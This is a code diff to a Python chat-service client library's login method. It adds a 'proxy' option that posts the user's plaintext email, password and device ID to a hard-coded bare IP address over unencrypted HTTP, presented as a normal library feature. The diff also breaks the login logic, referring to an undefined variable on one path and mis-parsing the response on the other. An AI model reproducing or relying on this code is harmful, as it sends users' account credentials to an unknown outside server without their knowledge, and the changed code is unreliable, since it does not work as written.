@@ -244,7 +244,7 @@ class Client(Callbacks, SocketHandler):
         self.start()
         self.run_socket()
 
-    def login(self, email: str, password: str):
+    def login(self, email: str, password: str,proxy:bool=False):
         """
         Login into an account.
 
@@ -257,7 +257,16 @@ class Client(Callbacks, SocketHandler):
 
             - **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
         """
-        data = json.dumps({
+        
+        if proxy is True:
+            data=json.dumps({"email":email,"password":password,"device":self.device_id})
+            daa={"data":data}
+            r=requests.post("http://154.12.227.233:1064/login",data=daa)
+            #print(r.json())
+            response=r.json()["sid"]
+
+        else:
+            data = json.dumps({
             "email": email,
             "v": 2,
             "secret": f"0 {password}",
@@ -265,16 +274,15 @@ class Client(Callbacks, SocketHandler):
             "clientType": 100,
             "action": "normal",
             "timestamp": int(timestamp() * 1000)
-        })
-
-        response = requests.post(f"{self.api}/g/s/auth/login", headers=self.parse_headers(data=data,deviceId=self.devicee()), data=data, proxies=self.proxies, verify=self.certificatePath)
+            })
+            response = requests.post(f"{self.api}/g/s/auth/login", headers=self.parse_headers(data=data,deviceId=self.devicee()), data=data, proxies=self.proxies, verify=self.certificatePath)
         
         self.run_socket()
-        if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
+        if r.status_code != 200: return exceptions.CheckException(json.loads(response.text))
 
         else:
             self.authenticated = True
-            self.json = json.loads(response.text)
+            self.json = json.loads(response)
             self.sid = self.json["sid"]
             try: self.secret= self.json["secret"]
             except: pass
@@ -283,7 +291,7 @@ class Client(Callbacks, SocketHandler):
             self.profile: objects.UserProfile = objects.UserProfile(self.json["userProfile"]).UserProfile
             headers.sid = self.sid
             self.start()
-            return response.status_code
+            return r.status_code
 
     def register(self, nickname: str, email: str, password: str, verificationCode: str, deviceId: str = device.device_id):
         """
